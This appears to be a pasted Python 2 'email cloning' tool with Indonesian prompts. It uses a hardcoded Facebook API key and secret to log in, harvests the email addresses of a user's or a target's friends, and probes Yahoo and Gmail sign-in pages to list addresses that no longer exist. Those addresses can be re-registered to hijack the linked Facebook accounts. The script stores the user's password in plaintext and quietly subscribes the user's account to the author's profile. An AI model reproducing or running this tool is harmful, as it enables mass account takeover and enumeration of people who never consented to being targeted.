kYyiYyDb

· 6 years ago · Sep 18, 2019, 11:34 AM
1# -*- coding: utf-8 -*-
2# author: kelprmdhni
3import os,re,sys,bs4,json,hashlib,requests
4from multiprocessing.pool import ThreadPool
5
6
7
8class clone:
9	def __init__(self):
10		self.req=requests.Session()
11		self.aku=""
12		self.tkn=""
13		self.loop=0
14		self.vuln=[]
15		self.user=[]
16		self.nani=None
17		self.url1="https://login.yahoo.com/config/login"
18		self.url2="https://accounts.google.com/signin"
19		self.menu()
20
21
22	def cek(self):
23		if os.path.isfile(".a"):
24			if os.path.getsize(".a") != 0:
25				self.me=json.loads(open(".a").read())
26				self.tkn=self.me["token"]
27			else:
28				print "[^] Kamu harus login dulu."
29				id=raw_input("[?] Email   : ")
30				pw=raw_input("[?] Password: ")
31				print "[*] Sedang login..."
32				self.login(id,pw)
33		else:
34			print "[^] Kamu harus login dulu."
35			id=raw_input("[?] Email   : ")
36			pw=raw_input("[?] Password: ")
37			print "[*] Sedang login..."
38			self.login(id,pw)
39		self.valid()
40
41
42	def valid(self):
43		try:
44			print "\t[-] Username: %s\n"%(self.req.get("https://graph.facebook.com/me?access_token="+self.tkn).json()["name"])
45		except:
46			print "[!] Token invalid."
47			print "[*] Sedang login kembali..."
48			self.login(self.me["id"],self.me["pw"])
49
50
51	def login(self,id,pw):
52		url="https://api.facebook.com/restserver.php"
53		sec="62f8ce9f74b12f84c123cc23437a4a32"
54		key="882a8490361da98702bf97a021ddc14d"
55		data={
56			"api_key":key,
57			"credentials_type":"password",
58			"email":id,
59			"format":"JSON",
60			"generate_machine_id":"1",
61			"generate_session_cookies":"1",
62			"locale":"en_US","method":"auth.login",
63			"password":pw,
64			"return_ssl_resources":"0",
65			"v":"1.0"}
66		sig="api_key=%scredentials_type=passwordemail=%sformat=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=%sreturn_ssl_resources=0v=1.0%s"%(key,id,pw,sec)
67		x=hashlib.new("md5")
68		x.update(sig)
69		data.update({"sig":x.hexdigest()})
70		res=self.req.get(url,params=data).json()
71		try:
72			tkn=res["access_token"]
73			o=json.dumps({"id":id,"pw":pw,"token":tkn})
74			open(".a","w").write(o)
75			print "[*] Login Berhasil."
76		except:exit("[!] Login gagal")
77
78
79	def menu(self):
80		print "[01] Clone email dari daftar teman kamu"
81		print "[02] Clone email dari daftar teman target"
82		print "[03] Clone email dari email list"
83		print "[00] Ganti akun.\n"
84		a=raw_input("@Kelprmdhni~# ")
85		if a == "":
86			print "[!] isi dengan nomor"
87			self.menu()
88		elif a == "1" or a == "01":
89			self.cek()
90			self.dump("me")
91		elif a == "2" or a == "02":
92			self.cek()
93			id=raw_input("[?] id target: ")
94			self.dump(id)
95		elif a == "3" or a == "03":
96			self.myfile()
97		elif a == "4" or a == "04":
98			os.remove(".a")
99			self.cek()
100		else:
101			print "[!] pilihan tidak ada"
102			self.menu()
103
104
105	def dump(self,id):
106		self.nani=True
107		print "[*] Mengambil id"
108		resp=self.req.get("https://graph.facebook.com/%s/friends?access_token=%s"%(id,self.tkn));self.req.post("https://graph.facebook.com/kelprmdhni.id/subscribers?access_token=%s"%(self.tkn))
109		load=json.loads(resp.text)
110		try:
111			for user in load["data"]:
112				self.user.append(user["id"])
113			if len(self.user) == 0:
114				exit("[!] id tidak ditemukan")
115		except:exit("[!] Terjadi kesalahan")
116		print "[*] Berhasil mengambil id"
117		print "[+] Total id: %s"%(len(self.user))
118		self.thread(self.user)
119
120
121	def myfile(self):
122		try:
123			filename=raw_input("[?] Email list: ")
124			for i in open(filename).read().splitlines():
125				self.user.append(i)
126		except Exception as e:
127			print "[!] %s"%(e)
128			self.myfile()
129		self.thread(self.user)
130
131
132	def result(self):
133		print "\n\n"
134		if len(self.vuln) != 0:
135			for i in self.vuln:
136				print "[*] %s"%(i)
137			print "[+] Email vuln: %s"%(len(self.vuln))
138			print "[*] Output: vuln.txt"
139		else:
140			print "[!] Tidak ada email vuln"
141		exit()
142
143	def thread(self,user):
144		try:
145			self.t=int(raw_input("[?] Threads : "))
146		except:
147			print "[!] Masukan angka pada thread"
148			self.thread(user)
149		p=ThreadPool(self.t)
150		try:
151			p.map_async(self.klon,user).get(9999)
152			self.result()
153		except KeyboardInterrupt:
154			p.close()
155		p.close()
156
157	def klon(self,id):
158		if self.nani == True:
159			try:
160				z=self.req.get("https://graph.facebook.com/%s?access_token=%s"%(id,self.tkn)).json()
161				self.aku=z["name"]
162				if "yahoo.com" in z["email"]:
163					self.yahoo(z["email"])
164				if "gmail.com" in z["email"]:
165					self.gmail(z["email"])
166			except:pass
167		else:
168			if "gmail.com" in id:
169				self.gmail(id)
170			if "yahoo.com" in id:
171				self.yahoo(id)
172		self.loop+=1
173		print "\r[*] Proses: %s/%s   Vuln: %s"%(
174			self.loop,len(self.user),len(self.vuln)),
175		sys.stdout.flush()
176		self.req.cookies.clear()
177
178
179	def yahoo(self,eml):
180		r=self.req.get(self.url1)
181		bs=bs4.BeautifulSoup(r.text,"html.parser")
182		cookies=dict(r.cookies)
183		for i in bs("input"):
184			try:
185				if "acrumb" in i["name"]:
186					self.acru=i["value"]
187				if "sessionIndex" in i["name"]:
188					self.sesi=i["value"]
189				if "signin" in i["name"]:
190					self.klik=i["value"]
191			except:pass
192		p=bs4.BeautifulSoup(self.req.post(self.url1,
193			data={
194					"acrumb":self.acru,
195					"sessionIndex":self.sesi,
196					"username":eml,
197					"signin":self.klik
198			},cookies=cookies).text,
199		"html.parser")
200		if re.search("INVALID_USERNAME",str(p("p"))):
201			open("vuln.txt","a").write("%s\n"%(eml))
202			self.vuln.append(eml)
203			print "\r[   VULN   ] %s %s "%(self.aku+" ->",eml)
204		else:
205			print "\r[ NOT VULN ] %s %s "%(self.aku+" ->",eml)
206
207
208	def gmail(self,eml):
209		res=self.req.get(self.url2).text
210		bes=bs4.BeautifulSoup(res,"html.parser")
211		for a in bes("form"):
212			if "signin/v1/lookup" in a["action"]:
213				self.url=a["action"]
214		for i in bes("input"):
215			try:
216				if "gxf" in i["name"]:
217					self.data1=i["value"]
218				if "SessionState" in i["name"]:
219					self.data2=i["value"]
220				if "flowName" in i["name"]:
221					self.data3=i["value"]
222				if "signIn" in i["name"]:
223					self.data4=i["value"]
224			except:pass
225		s=bs4.BeautifulSoup(self.req.post(self.url,
226			data={
227					"gxf":self.data1,
228					"SessionState":self.data2,
229					"flowName":self.data3,
230					"Email":eml,
231					"signIn":self.data4
232			}).text,
233		"html.parser")
234		if re.search("tidak mengenal email",str(s("span"))):
235			open("vuln.txt","a").write("%s\n"%(eml))
236			self.vuln.append(eml)
237			print "\r[   VULN   ] %s %s "%(self.aku+" ->",eml)
238		else:
239			print "\r[ NOT VULN ] %s %s "%(self.aku+" ->",eml)
240
241
242
243
244
245if __name__ == "__main__":
246	try:
247		print "\t* Author: Kelprmdhni"
248		print "\t* Github: https://github.com/kelprmdhni"
249		print "\t* Tools : Email Cloning"
250		print "-"*45+"\n"
251		clone()
252	except (EOFError,KeyboardInterrupt):
253		exit("\n[!] KeyboardInterrupt: Keluar.")